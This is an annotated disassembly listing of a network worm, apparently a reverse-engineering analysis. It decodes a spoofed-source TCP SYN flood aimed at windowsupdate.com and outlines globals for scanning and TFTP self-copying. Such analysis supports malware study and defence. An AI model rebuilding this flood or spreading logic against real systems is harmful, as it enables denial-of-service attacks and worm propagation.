.text:00401EC1 WUSYNFloodThread proc near ; DATA XREF: WinMain+304^o
.text:00401EC1
.text:00401EC1 optval = byte ptr -4
.text:00401EC1
.text:00401EC1 push ebp
.text:00401EC2 mov ebp, esp
.text:00401EC4 push ecx
.text:00401EC5 push ebx
.text:00401EC6 push esi
.text:00401EC7 push edi ; save callee-saved registers (IDA's "s" label is spurious here)
.text:00401EC8 mov dword ptr [ebp+optval], 1
.text:00401ECF push offset aWindowsupdate_ ; name
.text:00401ED4 call lookupIPAddr ; get IP address of "windowsupdate.com"
.text:00401ED9 pop ecx
.text:00401EDA mov esi, eax
.text:00401EDC push 1 ; dwFlags
.text:00401EDE push 0 ; g
.text:00401EE0 push 0 ; lpProtocolInfo
.text:00401EE2 push 0FFh ; protocol
.text:00401EE7 push 3 ; type
.text:00401EE9 push 2 ; af
.text:00401EEB call WSASocketA ; create raw IP socket
.text:00401EF0 mov edi, eax
.text:00401EF2 cmp eax, 0FFFFFFFFh
.text:00401EF5 jnz short loc_401EFB
.text:00401EF7 xor eax, eax
.text:00401EF9 jmp short loc_401F2F ; return 0
.text:00401EFB ; ---------------------------------------------------------------------------
.text:00401EFB
.text:00401EFB loc_401EFB: ; CODE XREF: WUSYNFloodThread+34^j
.text:00401EFB push 4 ; optlen
.text:00401EFD lea eax, [ebp+optval]
.text:00401F00 push eax ; optval
.text:00401F01 push 2 ; optname
.text:00401F03 push 0 ; level
.text:00401F05 push edi ; s
.text:00401F06 call setsockopt
.text:00401F0B cmp eax, 0FFFFFFFFh
.text:00401F0E jnz short loc_401F14 ; setsockopt() succeeded: enter the SYN send loop
.text:00401F10 xor eax, eax
.text:00401F12 jmp short loc_401F2F
.text:00401F14 ; ---------------------------------------------------------------------------
.text:00401F14
.text:00401F14 loc_401F14: ; CODE XREF: WUSYNFloodThread+4D^j
.text:00401F14 ; WUSYNFloodThread+64vj
.text:00401F14 push edi ; raw IP socket to use
.text:00401F15 push esi ; destination IP address (windowsupdate.com)
.text:00401F16 call sendTCP80SYN
.text:00401F1B add esp, 8
.text:00401F1E push 14h ; dwMilliseconds
.text:00401F20 call Sleep ; sleep for 20ms between SYN packets
.text:00401F25 jmp short loc_401F14 ; unconditional: loop forever (the closesocket()/return below is unreachable, so the thread never exits on its own)
.text:00401F27 ; ---------------------------------------------------------------------------
.text:00401F27 push edi
.text:00401F28 call closesocket
.text:00401F2D xor eax, eax
.text:00401F2F
.text:00401F2F loc_401F2F: ; CODE XREF: WUSYNFloodThread+38^j
.text:00401F2F ; WUSYNFloodThread+51^j
.text:00401F2F pop edi
.text:00401F30 pop esi
.text:00401F31 pop ebx
.text:00401F32 leave
.text:00401F33 retn 4
.text:00401F33 WUSYNFloodThread endp
.text:00401F33
.text:00401F36 IPv4 header:
.text:00401F36
.text:00401F36 -14 BYTE version / header len
.text:00401F36 -13 BYTE type of service
.text:00401F36 -12 WORD total length
.text:00401F36 -10 WORD identification
.text:00401F36 -0E BYTE flags
.text:00401F36 -0D BYTE frag offset
.text:00401F36 -0C BYTE time-to-live
.text:00401F36 -0B BYTE protocol
.text:00401F36 -0A WORD checksum
.text:00401F36 -08 DWORD source IP address
.text:00401F36 -04 DWORD dest IP address
.text:00401F36
.text:00401F36 TCP header:
.text:00401F36
.text:00401F36 -28 WORD source port
.text:00401F36 -26 WORD dest port
.text:00401F36 -24 DWORD sequence number
.text:00401F36 -20 DWORD ack number
.text:00401F36 -1C BYTE header length
.text:00401F36 -1B BYTE flags
.text:00401F36 -1A WORD window size
.text:00401F36 -18 WORD checksum
.text:00401F36 -16 WORD urgent pointer
.text:00401F36
.text:00401F36 IP "pseudoheader" for computing TCP checksum (RFC 793):
.text:00401F36
.text:00401F36 -70 DWORD source IP address
.text:00401F36 -6C DWORD dest IP address
.text:00401F36 -68 BYTE 0
.text:00401F36 -67 BYTE protocol (6: TCP)
.text:00401F36 -66 WORD TCP length (header + data; 20 here since the SYN carries no payload)
.text:00401F36
.text:00401F36 ; =============== S U B R O U T I N E =======================================
.text:00401F36
.text:00401F36 ; Attributes: bp-based frame
.text:00401F36
.text:00401F36 sendTCP80SYN proc near ; CODE XREF: WUSYNFloodThread+55^p
.text:00401F36
.text:00401F36 temprand2 = dword ptr -9Ch
.text:00401F36 temprand1 = dword ptr -98h
.text:00401F36 name = byte ptr -92h
.text:00401F36 destport = word ptr -82h
.text:00401F36 to = sockaddr ptr -80h
.text:00401F36 pseudoheader = byte ptr -70h
.text:00401F36 buf = byte ptr -64h
.text:00401F36 tcpheader = byte ptr -28h
.text:00401F36 ipv4header = byte ptr -14h
.text:00401F36 dwDestIP = dword ptr 8
.text:00401F36 s = dword ptr 0Ch
.text:00401F36
.text:00401F36 push ebp
.text:00401F37 mov ebp, esp
.text:00401F39 sub esp, 9Ch
.text:00401F3F push ebx
.text:00401F40 push esi
.text:00401F41 push edi
.text:00401F42
.text:00401F42 Initialization
.text:00401F42
.text:00401F42 lea edi, [ebp+buf]
.text:00401F45 lea esi, ds:4047B0h ; g_zerobuf60[]
.text:00401F4B mov ecx, 0Fh
.text:00401F50 rep movsd ; copy 60 byte buffer of zeroes into buf
.text:00401F52 mov [ebp+destport], 50h ; destination port (80)
.text:00401F5B call GetTickCount
.text:00401F60 push eax
.text:00401F61 call srand ; seed random number generator with GetTickCount()
.text:00401F66
.text:00401F66 Create random source address for spoofing
.text:00401F66
.text:00401F66 call rand
.text:00401F6B mov [ebp+temprand1], eax
.text:00401F71 call rand
.text:00401F76 mov ecx, 0FFh
.text:00401F7B cdq
.text:00401F7C idiv ecx
.text:00401F7E push edx ; fourth octet (random 0..254)
.text:00401F7F mov edi, [ebp+temprand1]
.text:00401F85 mov eax, edi
.text:00401F87 mov ecx, 0FFh
.text:00401F8C cdq
.text:00401F8D idiv ecx
.text:00401F8F push edx ; third octet (random 0..254)
.text:00401F90 push ds:synspoofoctet2
.text:00401F96 push ds:synspoofoctet1
.text:00401F9C push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401FA1 lea edi, [ebp+name]
.text:00401FA7 push edi
.text:00401FA8 call sprintf
.text:00401FAD lea eax, [ebp+name]
.text:00401FB3 push eax ; name
.text:00401FB4 call lookupIPAddr
.text:00401FB9 mov ebx, eax ; save source address to spoof in EBX
.text:00401FBB
.text:00401FBB Fill in target address (sockaddr) struct
.text:00401FBB
.text:00401FBB mov [ebp+to.sa_family], 2 ; AF_INET
.text:00401FC1 movzx eax, [ebp+destport]
.text:00401FC8 push eax ; hostshort
.text:00401FC9 call htons
.text:00401FCE mov edi, eax
.text:00401FD0 mov word ptr [ebp+to.sa_data], di ; destination port (80)
.text:00401FD4 mov eax, [ebp+dwDestIP]
.text:00401FD7 mov dword ptr [ebp+to.sa_data+2], eax
.text:00401FDA
.text:00401FDA Construct IPv4 header
.text:00401FDA
.text:00401FDA mov [ebp+ipv4header], 45h ; first byte of raw IP packet:
.text:00401FDA ; IPv4 / 20-byte header
.text:00401FDE push 28h ; hostshort
.text:00401FE0 call htons
.text:00401FE5 mov edi, eax
.text:00401FE7 mov word ptr [ebp+ipv4header+2], di ; total length = 40 bytes
.text:00401FEB mov word ptr [ebp+ipv4header+4], 1
.text:00401FF1 mov word ptr [ebp+ipv4header+6], 0 ; flags = 0
.text:00401FF7 mov [ebp+ipv4header+8], 80h ; TTL = 128
.text:00401FFB mov [ebp+ipv4header+9], 6 ; protocol = TCP (6)
.text:00401FFF mov word ptr [ebp+ipv4header+0Ah], 0 ; IP checksum
.text:00402005 mov eax, [ebp+dwDestIP]
.text:00402008 mov dword ptr [ebp+ipv4header+10h], eax ; destination IP (Windows Update)
.text:0040200B
.text:0040200B Begin constructing TCP header
.text:0040200B
.text:0040200B movzx eax, [ebp+destport]
.text:00402012 push eax ; hostshort
.text:00402013 call htons
.text:00402018 mov edi, eax
.text:0040201A mov word ptr [ebp+tcpheader+2], di ; destination port (80)
.text:0040201E and dword ptr [ebp+tcpheader+8], 0 ; zero out ack number
.text:00402022 mov [ebp+tcpheader+0Ch], 50h ; header length (50h --> 20 bytes)
.text:00402026 mov [ebp+tcpheader+0Dh], 2 ; flags: 2 = SYN
.text:0040202A push 4000h ; hostshort
.text:0040202F call htons
.text:00402034 mov edi, eax
.text:00402036 mov word ptr [ebp+tcpheader+0Eh], di ; window size: 16384
.text:0040203A mov word ptr [ebp+tcpheader+12h], 0 ; urgent ptr
.text:00402040 mov word ptr [ebp+tcpheader+10h], 0 ; TCP checksum
.text:00402046 mov eax, dword ptr [ebp+ipv4header+10h]
.text:00402049
.text:00402049 Construct IP pseudoheader
.text:00402049
.text:00402049 mov dword ptr [ebp+pseudoheader+4], eax ; destination IP (windowsupdate.com)
.text:0040204C mov [ebp+pseudoheader+8], 0 ; store 0 in pseudoheader
.text:00402050 mov [ebp+pseudoheader+9], 6 ; store protocol (6: TCP) in pseudoheader
.text:00402054 push 14h ; hostshort
.text:00402056 call htons
.text:0040205B mov edi, eax
.text:0040205D mov word ptr [ebp+pseudoheader+0Ah], di ; store TCP header size (20) in pseudoheader
.text:00402061
.text:00402061 Finish filling in IPv4 and TCP headers
.text:00402061
.text:00402061 mov dword ptr [ebp+ipv4header+0Ch], ebx ; source address
.text:00402064 call rand
.text:00402069 mov ecx, 3E8h
.text:0040206E cdq
.text:0040206F idiv ecx
.text:00402071 mov edi, edx
.text:00402073 add edi, 3E8h
.text:00402079 and edi, 0FFFFh ; (rand() % 1000) + 1000
.text:0040207F push edi ; hostshort
.text:00402080 call htons
.text:00402085 mov edi, eax
.text:00402087 mov word ptr [ebp+tcpheader], di ; first bytes of TCP header:
.text:00402087 ; source port = random 1000..1999
.text:0040208B call rand
.text:00402090 mov [ebp+temprand2], eax
.text:00402096 call rand
.text:0040209B mov edi, [ebp+temprand2]
.text:004020A1 shl edi, 10h
.text:004020A4 or edi, eax
.text:004020A6 and edi, 0FFFFh
.text:004020AC push edi ; hostshort
.text:004020AD call htons ; htons( ((rand() << 16) | rand()) & 0xFFFF )
.text:004020B2 mov edi, eax
.text:004020B4 and edi, 0FFFFh
.text:004020BA mov dword ptr [ebp+tcpheader+4], edi ; sequence number
.text:004020BD mov dword ptr [ebp+pseudoheader], ebx ; source address
.text:004020C0
.text:004020C0 Calculate and store IPv4 and TCP checksums
.text:004020C0
.text:004020C0 push 0Ch
.text:004020C2 lea eax, [ebp+pseudoheader]
.text:004020C5 push eax
.text:004020C6 lea eax, [ebp+buf]
.text:004020C9 push eax
.text:004020CA call memcpy ; copy IP pseudoheader into buf[]
.text:004020CF push 14h
.text:004020D1 lea eax, [ebp+tcpheader]
.text:004020D4 push eax
.text:004020D5 lea eax, [ebp+buf+0Ch] ; &(buf[0x0C])
.text:004020D8 push eax
.text:004020D9 call memcpy ; copy TCP header after pseudoheader into buf[]
.text:004020DE push 20h ; dwLength
.text:004020E0 lea eax, [ebp+buf]
.text:004020E3 push eax ; lpData
.text:004020E4 call computeChecksum ; compute checksum of (IP pseudoheader + TCP header)
.text:004020E9 mov edi, eax
.text:004020EB mov word ptr [ebp+tcpheader+10h], di ; store TCP checksum in TCP header
.text:004020EF push 14h
.text:004020F1 lea eax, [ebp+ipv4header]
.text:004020F4 push eax
.text:004020F5 lea eax, [ebp+buf]
.text:004020F8 push eax
.text:004020F9 call memcpy ; now copy IPv4 header into buf[]
.text:004020FE push 14h
.text:00402100 lea eax, [ebp+tcpheader]
.text:00402103 push eax
.text:00402104 lea eax, [ebp+buf+14h] ; &(buf[0x14])
.text:00402107 push eax
.text:00402108 call memcpy ; copy TCP header after IPv4 header in buf[]
.text:0040210D push 4
.text:0040210F push 0
.text:00402111 lea eax, [ebp+buf+28h]
.text:00402114 push eax
.text:00402115 call memset
.text:0040211A push 28h ; dwLength: 28h (40)
.text:0040211C lea eax, [ebp+buf]
.text:0040211F push eax ; lpData: buf
.text:00402120 call computeChecksum
.text:00402125 mov edi, eax
.text:00402127 mov word ptr [ebp+ipv4header+0Ah], di ; store IPv4 checksum in IPv4 header
.text:0040212B
.text:0040212B Send TCP SYN packet to destination IP address
.text:0040212B
.text:0040212B push 14h
.text:0040212D lea eax, [ebp+ipv4header]
.text:00402130 push eax
.text:00402131 lea eax, [ebp+buf]
.text:00402134 push eax
.text:00402135 call memcpy ; copy IPv4 header to buffer
.text:0040213A add esp, 78h
.text:0040213D push 10h ; tolen
.text:0040213F lea eax, [ebp+to]
.text:00402142 push eax ; to
.text:00402143 push 0 ; flags
.text:00402145 push 28h ; len = 40 bytes
.text:00402147 lea eax, [ebp+buf]
.text:0040214A push eax ; buf
.text:0040214B push [ebp+s] ; s
.text:0040214E call sendto ; -- send 40-byte raw IP packet
.text:00402153 pop edi
.text:00402154 pop esi
.text:00402155 pop ebx
.text:00402156 leave
.text:00402157 retn
.text:00402157 sendTCP80SYN endp
.text:00402157
.text:00402158 ; [00000006 BYTES: COLLAPSED FUNCTION htons. PRESS KEYPAD "+" TO EXPAND]
.text:0040215E dd 9090h
.text:00402162 align 4
.text:00402164 ; [00000006 BYTES: COLLAPSED FUNCTION ioctlsocket. PRESS KEYPAD "+" TO EXPAND]
.text:0040216A align 8
.text:00402170 ; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND]
.text:00402176 dd 9090h
.text:0040217A align 4
.text:0040217C ; [00000006 BYTES: COLLAPSED FUNCTION inet_ntoa. PRESS KEYPAD "+" TO EXPAND]
.text:00402182 align 8
.text:00402188 ; [00000006 BYTES: COLLAPSED FUNCTION recvfrom. PRESS KEYPAD "+" TO EXPAND]
.text:0040218E dd 9090h
.text:00402192 align 4
.text:00402194 ; [00000006 BYTES: COLLAPSED FUNCTION select. PRESS KEYPAD "+" TO EXPAND]
.text:0040219A align 8
.text:004021A0 ; [00000006 BYTES: COLLAPSED FUNCTION send. PRESS KEYPAD "+" TO EXPAND]
.text:004021A6 dd 9090h
.text:004021AA align 4
.text:004021AC ; [00000006 BYTES: COLLAPSED FUNCTION sendto. PRESS KEYPAD "+" TO EXPAND]
.text:004021B2 align 8
.text:004021B8 ; [00000006 BYTES: COLLAPSED FUNCTION setsockopt. PRESS KEYPAD "+" TO EXPAND]
.text:004021BE dd 9090h
.text:004021C2 align 4
.text:004021C4 ; [00000006 BYTES: COLLAPSED FUNCTION socket. PRESS KEYPAD "+" TO EXPAND]
.text:004021CA align 8
.text:004021D0 ; [00000006 BYTES: COLLAPSED FUNCTION gethostbyname. PRESS KEYPAD "+" TO EXPAND]
.text:004021D6 dd 9090h
.text:004021DA align 4
.text:004021DC ; [00000006 BYTES: COLLAPSED FUNCTION bind. PRESS KEYPAD "+" TO EXPAND]
.text:004021E2 align 8
.text:004021E8 ; [00000006 BYTES: COLLAPSED FUNCTION gethostname. PRESS KEYPAD "+" TO EXPAND]
.text:004021EE dd 9090h
.text:004021F2 align 4
.text:004021F4 ; [00000006 BYTES: COLLAPSED FUNCTION closesocket. PRESS KEYPAD "+" TO EXPAND]
.text:004021FA align 8
.text:00402200 ; [00000006 BYTES: COLLAPSED FUNCTION WSAStartup. PRESS KEYPAD "+" TO EXPAND]
.text:00402206 dd 9090h
.text:0040220A align 4
.text:0040220C ; [00000006 BYTES: COLLAPSED FUNCTION WSACleanup. PRESS KEYPAD "+" TO EXPAND]
.text:00402212 align 8
.text:00402218 ; [00000006 BYTES: COLLAPSED FUNCTION connect. PRESS KEYPAD "+" TO EXPAND]
.text:0040221E dd 9090h
.text:00402222 align 4
.text:00402224 ; [00000006 BYTES: COLLAPSED FUNCTION getpeername. PRESS KEYPAD "+" TO EXPAND]
.text:0040222A align 8
.text:00402230 ; [00000006 BYTES: COLLAPSED FUNCTION getsockname. PRESS KEYPAD "+" TO EXPAND]
.text:00402236 dd 9090h
.text:0040223A align 4
.text:0040223C ; [00000006 BYTES: COLLAPSED FUNCTION WSASocketA. PRESS KEYPAD "+" TO EXPAND]
.text:00402242 align 8
.text:00402248 ; [00000006 BYTES: COLLAPSED FUNCTION InternetGetConnectedState. PRESS KEYPAD "+" TO EXPAND]
.text:0040224E dd 9090h
.text:00402252 align 4
.text:00402254
.text:00402254 ; =============== S U B R O U T I N E =======================================
.text:00402254
.text:00402254 ; Attributes: bp-based frame
.text:00402254
.text:00402254 sub_402254 proc near ; CODE XREF: start+66^p
.text:00402254 ; CRT shim between start and WinMain. Takes the raw command line from
.text:00402254 ; GetCommandLineA, walks EDI past the program-name token (quoted or
.text:00402254 ; unquoted) and the spaces after it, then calls
.text:00402254 ; WinMain(GetModuleHandleA(0), 0, lpCmdLine = EDI, nCmdShow = 1)
.text:00402254 ; and hands WinMain's EAX back to the caller. EDI is saved/restored;
.text:00402254 ; the pushed ECX only reserves the var_4 slot (its value is never read).
.text:00402254
.text:00402254 var_4 = dword ptr -4 ; strchr() result: closing quote or NULL (written, never read here)
.text:00402254
.text:00402254 push ebp
.text:00402255 mov ebp, esp
.text:00402257 push ecx ; reserve the var_4 slot
.text:00402258 push edi ; callee-saved; EDI is the command-line cursor below
.text:00402259 call GetCommandLineA
.text:0040225E mov edi, eax ; edi = full command line, program name first
.text:00402260 cmp byte ptr [edi], 22h ; does it start with '"' ?
.text:00402263 jnz short loc_402288 ; no: unquoted program name
.text:00402265 push 22h ; '"' (double quote) -- char to search for
.text:00402267 mov eax, edi
.text:00402269 inc eax ; search from just after the opening quote
.text:0040226A push eax
.text:0040226B call strchr ; find the closing quote
.text:00402270 add esp, 8 ; cdecl: caller pops the two arguments
.text:00402273 mov [ebp+var_4], eax
.text:00402276 or eax, eax ; NULL = no closing quote
.text:00402278 jz short loc_4022A3 ; then the whole line (edi unchanged, quote included) becomes lpCmdLine
.text:0040227A mov edi, eax
.text:0040227C inc edi ; edi = first char after the closing quote
.text:0040227D jmp short loc_402280
.text:0040227F ; ---------------------------------------------------------------------------
.text:0040227F
.text:0040227F loc_40227F: ; CODE XREF: sub_402254+2Fvj
.text:0040227F inc edi
.text:00402280
.text:00402280 loc_402280: ; CODE XREF: sub_402254+29^j
.text:00402280 cmp byte ptr [edi], 20h ; skip the run of spaces after the closing quote
.text:00402283 jz short loc_40227F
.text:00402285 jmp short loc_4022A3 ; stops at NUL or any other non-space (only 20h is skipped)
.text:00402287 ; ---------------------------------------------------------------------------
.text:00402287
.text:00402287 loc_402287: ; CODE XREF: sub_402254+3Evj
.text:00402287 inc edi
.text:00402288
.text:00402288 loc_402288: ; CODE XREF: sub_402254+F^j
.text:00402288 movsx eax, byte ptr [edi] ; unquoted name: advance to the first space or NUL
.text:0040228B or eax, eax ; (sign-extension is harmless: only ==0 / ==20h are tested)
.text:0040228D jz short loc_402294
.text:0040228F cmp eax, 20h
.text:00402292 jnz short loc_402287
.text:00402294
.text:00402294 loc_402294: ; CODE XREF: sub_402254+39^j
.text:00402294 jmp short loc_402297
.text:00402296 ; ---------------------------------------------------------------------------
.text:00402296
.text:00402296 loc_402296: ; CODE XREF: sub_402254+4Dvj
.text:00402296 inc edi
.text:00402297
.text:00402297 loc_402297: ; CODE XREF: sub_402254+40^j
.text:00402297 movsx eax, byte ptr [edi] ; then skip the spaces that separate name and arguments
.text:0040229A or eax, eax
.text:0040229C jz short loc_4022A3 ; NUL reached: no arguments, lpCmdLine = ""
.text:0040229E cmp eax, 20h
.text:004022A1 jz short loc_402296
.text:004022A3
.text:004022A3 loc_4022A3: ; CODE XREF: sub_402254+24^j
.text:004022A3 ; sub_402254+31^j ...
.text:004022A3 push 0 ; lpModuleName
.text:004022A5 call GetModuleHandleA ; eax = hInstance of this executable
.text:004022AA push 1 ; nCmdShow (1 = SW_SHOWNORMAL)
.text:004022AC push edi ; lpCmdLine (arguments only, program name stripped)
.text:004022AD push 0 ; hPrevInstance (always 0 on Win32)
.text:004022AF push eax ; hInstance
.text:004022B0 call WinMain ; stdcall: no add esp afterwards
.text:004022B5 pop edi
.text:004022B6 leave ; drops the var_4 slot, restores ebp
.text:004022B7 retn ; eax = WinMain's return value
.text:004022B7 sub_402254 endp
.text:004022B7
.text:004022B8
.text:004022B8 ; =============== S U B R O U T I N E =======================================
.text:004022B8
.text:004022B8
.text:004022B8 allocstackspace proc near ; CODE XREF: infectTarget+8^p
.text:004022B8 ; Stack probe, same shape as the CRT's __chkstk / _alloca_probe.
.text:004022B8 ; In:  eax = number of bytes to reserve below the caller's esp
.text:004022B8 ; Out: esp lowered by eax; eax left as the sub-page remainder;
.text:004022B8 ;      ecx clobbered (holds the return address).
.text:004022B8 ; The return address is popped first so that the sub esp below
.text:004022B8 ; lands underneath it, hence the jmp ecx instead of retn.
.text:004022B8 ; Each 1000h-byte page of the new area is read once via [esp] on
.text:004022B8 ; the way down -- presumably so the guard page commits the stack one
.text:004022B8 ; page at a time; the test result itself is never used.
.text:004022B8 ; NOTE(review): the loop assumes eax >= 1000h on entry; a smaller
.text:004022B8 ; value wraps at the first sub eax,1000h and the unsigned jnb keeps
.text:004022B8 ; looping -- confirm the size passed at infectTarget+8.
.text:004022B8 pop ecx ; ecx = return address
.text:004022B9
.text:004022B9 loc_4022B9: ; CODE XREF: allocstackspace+14vj
.text:004022B9 sub esp, 1000h ; move esp down one page
.text:004022BF sub eax, 1000h ; bytes still to reserve
.text:004022C4 test [esp], eax ; touch the new page (flags overwritten by the cmp)
.text:004022C7 cmp eax, 1000h
.text:004022CC jnb short loc_4022B9 ; at least one full page left: repeat (unsigned compare)
.text:004022CE sub esp, eax ; final partial page
.text:004022D0 test [esp], eax ; touch it as well
.text:004022D3 jmp ecx ; return to caller (return address was popped above)
.text:004022D3 allocstackspace endp
.text:004022D3
.text:004022D3 ; ---------------------------------------------------------------------------
.text:004022D5 align 4
.text:004022D8 ; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
.text:004022DE dd 9090h
.text:004022E2 align 4
.text:004022E4 ; [00000006 BYTES: COLLAPSED FUNCTION ExitThread. PRESS KEYPAD "+" TO EXPAND]
.text:004022EA align 8
.text:004022F0 ; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
.text:004022F6 dd 9090h
.text:004022FA align 4
.text:004022FC ; [00000006 BYTES: COLLAPSED FUNCTION GetDateFormatA. PRESS KEYPAD "+" TO EXPAND]
.text:00402302 align 8
.text:00402308 ; [00000006 BYTES: COLLAPSED FUNCTION GetLastError. PRESS KEYPAD "+" TO EXPAND]
.text:0040230E dd 9090h
.text:00402312 align 4
.text:00402314 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
.text:0040231A align 8
.text:00402320 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
.text:00402326 dd 9090h
.text:0040232A align 4
.text:0040232C ; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
.text:00402332 align 8
.text:00402338 ; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND]
.text:0040233E dd 9090h
.text:00402342 align 4
.text:00402344 ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
.text:0040234A align 8
.text:00402350 ; [00000006 BYTES: COLLAPSED FUNCTION CreateMutexA. PRESS KEYPAD "+" TO EXPAND]
.text:00402356 dd 9090h
.text:0040235A align 4
.text:0040235C ; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
.text:00402362 align 8
.text:00402368 ; [00000006 BYTES: COLLAPSED FUNCTION TerminateThread. PRESS KEYPAD "+" TO EXPAND]
.text:0040236E dd 9090h
.text:00402372 align 4
.text:00402374 ; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND]
.text:0040237A align 8
.text:00402380 ; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND]
.text:00402386 dd 9090h
.text:0040238A align 4
.text:0040238C ; [00000006 BYTES: COLLAPSED FUNCTION RegCreateKeyExA. PRESS KEYPAD "+" TO EXPAND]
.text:00402392 align 8
.text:00402398 ; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND]
.text:0040239E dd 9090h
.text:004023A2 align 4
.text:004023A4 ; [00000006 BYTES: COLLAPSED FUNCTION __GetMainArgs. PRESS KEYPAD "+" TO EXPAND]
.text:004023AA align 8
.text:004023B0 ; [00000006 BYTES: COLLAPSED FUNCTION atoi. PRESS KEYPAD "+" TO EXPAND]
.text:004023B6 dd 9090h
.text:004023BA align 4
.text:004023BC ; [00000006 BYTES: COLLAPSED FUNCTION exit. PRESS KEYPAD "+" TO EXPAND]
.text:004023C2 align 8
.text:004023C8 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND]
.text:004023CE dd 9090h
.text:004023D2 align 4
.text:004023D4 ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND]
.text:004023DA align 8
.text:004023E0 ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND]
.text:004023E6 dd 9090h
.text:004023EA align 4
.text:004023EC ; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
.text:004023F2 align 8
.text:004023F8 ; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
.text:004023FE dd 9090h
.text:00402402 align 4
.text:00402404 ; [00000006 BYTES: COLLAPSED FUNCTION raise. PRESS KEYPAD "+" TO EXPAND]
.text:0040240A align 8
.text:00402410 ; [00000006 BYTES: COLLAPSED FUNCTION rand. PRESS KEYPAD "+" TO EXPAND]
.text:00402416 dd 9090h
.text:0040241A align 4
.text:0040241C ; [00000006 BYTES: COLLAPSED FUNCTION signal. PRESS KEYPAD "+" TO EXPAND]
.text:00402422 align 8
.text:00402428 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND]
.text:0040242E dd 9090h
.text:00402432 align 4
.text:00402434 ; [00000006 BYTES: COLLAPSED FUNCTION srand. PRESS KEYPAD "+" TO EXPAND]
.text:0040243A align 8
.text:00402440 ; [00000006 BYTES: COLLAPSED FUNCTION strchr. PRESS KEYPAD "+" TO EXPAND]
.text:00402446 dd 9090h
.text:0040244A align 4
.text:0040244C ; [00000006 BYTES: COLLAPSED FUNCTION strtok. PRESS KEYPAD "+" TO EXPAND]
.text:00402452 align 8
.text:00402452 _text ends
.text:00402452
.bss:00403000 ; Section 2. (virtual address 00003000)
.bss:00403000 ; Virtual size : 0000013C ( 316.)
.bss:00403000 ; Section size in file : 00000000 ( 0.)
.bss:00403000 ; Offset to raw data for section: 00000000
.bss:00403000 ; Flags C0000080: Bss Readable Writable
.bss:00403000 ; Alignment : 16 bytes ?
.bss:00403000 ; ---------------------------------------------------------------------------
.bss:00403000
.bss:00403000 ; Segment type: Uninitialized
.bss:00403000 ; Segment permissions: Read/Write
.bss:00403000 _bss segment para public 'BSS' use32
.bss:00403000 assume cs:_bss
.bss:00403000 ;org 403000h
.bss:00403000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.bss:00403000 ; Worm globals (uninitialised). Only the names, sizes and XREFs are
.bss:00403000 ; established by this listing; the roles below are inferred from the
.bss:00403000 ; call sites the XREFs point at and should be confirmed there.
.bss:00403000 ; char cp
.bss:00403000 cp db 10h dup(?) ; DATA XREF: infect20Hosts+91^o
.bss:00403000 ; infect20Hosts+9E^o ...
.bss:00403000 ; 16 bytes = longest dotted quad ("255.255.255.255") + NUL. The
.bss:00403000 ; XREF follows infect20Hosts+8C, which takes "%i.%i.%i.%i", so this
.bss:00403000 ; is presumably the sprintf target for the address being scanned
.bss:00403010 octet2 dd ? ; DATA XREF: WinMain+1C6^w
.bss:00403010 ; WinMain+219^r ...
.bss:00403010 ; octet1..octet4: the four octets of the address currently being
.bss:00403010 ; scanned -- written by WinMain, octet4 also read by incrementOctets
.bss:00403014 synspoofoctet1 dd ? ; DATA XREF: WinMain+103^w
.bss:00403014 ; WinMain+214^w ...
.bss:00403014 ; first octet of the spoofed SYN source address: sendTCP80SYN pushes
.bss:00403014 ; synspoofoctet1/synspoofoctet2 as the first two "%i" of the source IP
.bss:00403018 db ? ; 8 unnamed bytes, no XREF shown (padding)
.bss:00403019 db ? ;
.bss:0040301A db ? ;
.bss:0040301B db ? ;
.bss:0040301C db ? ;
.bss:0040301D db ? ;
.bss:0040301E db ? ;
.bss:0040301F db ? ;
.bss:00403020 ; CHAR Filename
.bss:00403020 Filename db 104h dup(?) ; DATA XREF: WinMain+B9^o
.bss:00403020 ; TFTPServerThread+BF^o
.bss:00403020 ; 260 (104h) = MAX_PATH
.bss:00403020 ; filled by WinMain (GetModuleFileNameA is among the imports, so
.bss:00403020 ; likely the worm's own path) and read by TFTPServerThread next to
.bss:00403020 ; its "rb" fopen mode at +BA -- confirm in those functions
.bss:00403124 ; SOCKET s
.bss:00403124 s dd ? ; DATA XREF: TFTPServerThread+21^w
.bss:00403124 ; TFTPServerThread+6B^r ...
.bss:00403124 ; socket owned by TFTPServerThread (written once at +21, read after)
.bss:00403128 octet1 dd ? ; DATA XREF: WinMain+1A9^w
.bss:00403128 ; WinMain+20F^r ...
.bss:0040312C octet4 dd ? ; DATA XREF: WinMain+E0^w
.bss:0040312C ; incrementOctets^r ...
.bss:00403130 octet3 dd ? ; DATA XREF: WinMain+1E6^w
.bss:00403130 ; WinMain+209^w ...
.bss:00403134 dwWhichRetAddr dd ? ; DATA XREF: WinMain+246^w
.bss:00403134 ; WinMain+262^w ...
